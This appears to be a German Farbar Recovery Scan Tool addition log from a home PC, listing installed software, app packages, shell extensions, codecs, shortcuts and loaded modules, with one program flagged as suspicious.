DVBViewer Pro (HKLM-x32\...\DVBViewer Pro_is1) (Version: 6.0.4 - CM&V)
Elevated Installer (HKLM-x32\...\{877496C2-70B0-42F1-835A-FAFE2CF0199C}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Epic Games Launcher (HKLM-x32\...\{AF7881ED-41D7-4ECA-8C7C-AE10DFA0E489}) (Version: 1.1.151.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Gameforge Client (HKLM-x32\...\{d3b2a0c1-f0d0-4888-ae0b-1c5e1febdafb}_is1) (Version: 2.1.12.165 - Gameforge)
Garmin Express (HKLM-x32\...\{235f2ee5-7383-44df-a298-01221caa5532}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{E944FA32-8BCF-474F-BFB2-D1EF24555873}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
GIMP 2.10.14 (HKLM\...\GIMP-2_is1) (Version: 2.10.14 - The GIMP Team)
Google Earth Pro (HKLM-x32\...\{59F21DFB-6977-434B-9CB9-67783D6E7B6B}) (Version: 7.3.3.7786 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.22) (Version: 9.22 - Artifex Software Inc.)
Hauppauge WinTV 8 (HKLM-x32\...\Hauppauge WinTV 8) (Version: v8.0.35159 (CD 5.6) - Hauppauge Computer Works)
IrfanView 4.50 (64-bit) (HKLM\...\IrfanView64) (Version: 4.50 - Irfan Skiljan)
Java 10.0.2 (64-bit) (HKLM\...\{EECB2736-D013-5AC5-9917-7656712F6931}) (Version: 10.0.2.0 - Oracle Corporation)
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
Java(TM) SE Development Kit 12.0.2 (64-bit) (HKLM\...\{3FA68A00-9C88-5E69-870A-B40CB89DC2EF}) (Version: 12.0.2.0 - Oracle Corporation)
K-Lite Mega Codec Pack 14.9.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.9.4 - KLCP)
Krita (x64) 4.2.3 (HKLM\...\Krita_x64) (Version: 4.2.3.0 - Krita Foundation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LEGO Digital Designer (HKLM-x32\...\New LEGO Digital Designer) (Version:  - LEGO A/S)
Lidl Fotos (HKLM-x32\...\{FDABC3E8-59D0-4B9E-B181-4597DD6B4B74}_is1) (Version:  - Lidl DE)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.3.6 - CEWE Stiftung u Co. KGaA)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.52 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft Office FrontPage 2003 (HKLM-x32\...\{90170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Retail - de-de) (Version: 16.0.13328.20356 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\OneDriveSetup.exe) (Version: 19.103.0527.0003 - Microsoft Corporation)
Microsoft SQL Server*2014 Express LocalDB  (HKLM\...\{CA191120-4CB1-4E3D-89B8-79FDB9017A2E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Teams) (Version: 1.3.00.24755 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 83.0.0.7621 - Mozilla)
Mozilla Thunderbird 52.5.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 52.5.0 (x86 de)) (Version: 52.5.0 - Mozilla)
Mozilla Thunderbird 78.5.0 (x86 de) (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Mozilla Thunderbird 78.5.0 (x86 de)) (Version: 78.5.0 - Mozilla)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.11 - F.J. Wechselberger)
News File Grabber 4.6.0.4 (HKLM-x32\...\News File Grabber_is1) (Version:  - RSBR-Software)
NosTale de-DE (HKLM-x32\...\{dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9.de-DE}) (Version:  - Gameforge)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.9 - Notepad++ Team)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 24.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
OpenAudible 2.3.5 (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\7008-5171-7013-3819) (Version: 2.3.5 - openaudible.org)
Origin (HKLM-x32\...\Origin) (Version: 10.5.89.45622 - Electronic Arts, Inc.)
PDF24 Creator 9.2.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.0 - PDF24.org)
Phase 5 HTML-Editor (HKLM-x32\...\{20B1B020-DEAE-48D1-9960-D4C3185D758B}) (Version: 5.6.2.3 - Systemberatung Schommer)
Plex Media Server (HKLM-x32\...\{1b8e71fc-44b8-4550-9376-72db5f2746ce}) (Version: 1.11.3.4803 - Plex, Inc.)
Plex Media Server (HKLM-x32\...\{617D6B5B-FCAE-43F5-9B09-73798070833E}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Pokémon Trading Card Game Online (HKLM-x32\...\{C239A609-2496-402F-A119-4BF92B43D717}) (Version: 2.49.0 - The Pokémon Company International)
ProgTV 2 (x64) x64 (HKLM\...\ProgTV) (Version: 2.x - Prog)
QuickPar 0.9 (HKLM-x32\...\QuickPar) (Version: 0.9 - Peter B. Clements)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7910 - Realtek Semiconductor Corp.)
RecordPad Audio-Recorder (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Recordpad) (Version: 7.05 - NCH Software)
RV-Print 2.0 (HKLM-x32\...\{38DC365A-06D8-494C-8F29-04B3A6652ACE}) (Version: 2.00.684.0 - Resch-Verlag)
SABnzbd 2.3.7 (HKLM-x32\...\SABnzbd) (Version: 2.3.7 - The SABnzbd Team)
Scratch 2 Offline Editor (HKLM-x32\...\{6E988774-5309-E02E-7EA8-F19CB65C2063}) (Version: 255 - Massachusetts Institute of Technology) Hidden
Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 461 - Massachusetts Institute of Technology)
Settlers 7 (HKLM-x32\...\Uplay Install 8) (Version:  - Ubisoft)
Shotcut (HKLM-x32\...\Shotcut) (Version: 20.02.17 - Meltytech, LLC)
SpeedCommander 16 (x64) (HKLM\...\SpeedCommander 16 (x64)) (Version: 16.20.8300 - SWE Sven Ritter)
SpeedCommander 17 (x64) (HKLM\...\SpeedCommander 17 (x64)) (Version: 17.30.8900 - SWE Sven Ritter)
StarMoney (HKLM-x32\...\{54552154-C54F-4F81-99FE-84567C2BCB56}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{5C1209B1-FA1D-40D3-BA13-4ED9F0F31002}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{99D7711E-74BE-4920-8088-CB785D4C406F}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B535DF59-3B5C-40B6-934B-BAF2987CA9A0}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B98B1721-994D-4B47-B097-ADD88E57A298}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{BA8CA518-A9B4-485C-AEE0-22E3F0E0E5F6}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{E771D898-9A06-4EEF-B84D-B2DB75080F3E}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{F8726CFE-2A08-4B2A-9E10-645F38D5A04A}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney 11  (HKLM-x32\...\{99DED8BC-9674-43AA-AE56-8E52C15769B1}) (Version: 11 - Star Finanz GmbH)
StarMoney 12 Basic  (HKLM-x32\...\{80A5295E-DD70-4A94-86A3-8F63AE01F0E5}) (Version: 12 - Star Finanz GmbH)
Startfenster-Replace (HKLM-x32\...\Startfenster-Replace.de) (Version: 1.0.3 - Startfenster-Replace) <==== ACHTUNG
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StExBar (HKLM-x32\...\{A5927ACA-AE5E-44E6-97BA-3E512CFF3963}) (Version: 1.10.0 - Stefans Tools)
Stopping Plex (HKLM-x32\...\{E70B9551-B5D4-41BC-AB7C-EE44025F77DC}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Synology Assistant (remove only) (HKLM-x32\...\Synology Assistant) (Version: 6.1-15163 - Synology)
Synology Photo Station Uploader (remove only) (HKLM-x32\...\Photo Station Uploader) (Version: 1.4.3.087 - Synology)
T16 Wired Gaming Mouse (HKLM-x32\...\{444BE55C-4B14-4DB8-9922-6846C1437677}_is1) (Version: 1.0.3 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.2.1 - TeamSpeak Systems GmbH)
TempoPerfect Metronome Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\TempoPerfect) (Version: 4.08 - NCH Software)
Titanfall™ 2 (HKLM-x32\...\{4BD80373-FEE7-45B6-8249-6E8E98717405}) (Version: 1.0.1.3 - Electronic Arts, Inc.)
Tone Generator Tongenerator-Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\ToneGen) (Version: 3.05 - NCH Software)
twengoo (HKLM-x32\...\{2ADA8DBD-2833-4235-A07E-0CD653A992FF}) (Version: 1.0.0.0 - Twengoo)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Updater (HKLM-x32\...\Updater) (Version: 1.0 - Updater)
Uplay (HKLM-x32\...\Uplay) (Version: 73.0 - Ubisoft)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version:  - DownloadHelper)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
VSDC Free Video Editor Version 6.4.2.102 (HKLM\...\VSDC Free Video Editor_is1) (Version: 6.4.2.102 - Flash-Integro LLC)
Wahlhelfer2018 (HKLM-x32\...\{AFC040C0-4AB0-11DE-5F90-00A66CB96952}) (Version: Version 1.34 - W.A.F. Institut AG)
WavePad Audio-Editor (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\WavePad) (Version: 8.08 - NCH Software)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
Windows 7 Games for Windows 10 and 8 (HKLM\...\Win7Games) (Version: 2.0 - hxxp://winaero.com)
Windows-Treiberpaket - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows-Treiberpaket - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
Wondershare Filmora9(Build 9.3.6) (HKLM\...\Wondershare Filmora9_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
World in Conflict (HKLM-x32\...\Uplay Install 90) (Version:  - Ubisoft)

Packages:
=========
Audible - Hörbuch und Hörspiel App -> C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2 [2020-11-25] (Audible Inc)
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_121.1.193.0_x64__v10z8vjag6ke6 [2020-11-05] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_4.0.11030.0_x64__8wekyb3d8bbwe [2020-11-15] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-10-21] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-09-24] (Notepad++ -> )
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => d:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) [Datei ist nicht signiert]
ContextMenuHandlers1-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-02] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\system32\x264vfw64.dll [3799552 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\system32\lagarith.dll [148992 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\system32\xvidvfw.dll [311296 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\system32\AC3ACM.acm [180736 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.voxacm160] => C:\Windows\system32\vct3216.acm [82944 2003-05-21] (Voxware, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.scg726] => C:\Windows\system32\scg726.acm [13239 2000-03-14] (SHARP Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.alf2cd] => C:\Windows\system32\alf2cd.acm [38912 2003-05-21] (NCT Company) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.lame] => C:\Windows\system32\lame.ax [245760 2005-08-01] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.dvsd] => C:\Windows\system32\mcdvd_32.dll [261632 2003-05-21] (MainConcept) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mpg4] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp42] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp43] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\system32\DivX.dll [638976 2003-05-22] (DivXNetworks, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\SysWOW64\lagarith.dll [216064 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [284672 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\SysWOW64\ac3acm.acm [122880 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.FFDS] => C:\Windows\SysWOW64\ff_vfw.dll [112128 2015-10-24] () [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Tom\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
Shortcut: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2019-06-17 20:35 - 2013-01-15 16:06 - 000061952 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2020-11-25 22:21 - 2020-11-25 22:21 - 040403968 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleRT.WindowsPhone.dll
2020-11-15 10:30 - 2020-11-15 10:31 - 000052224 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleSystemFileWrapperRT.dll
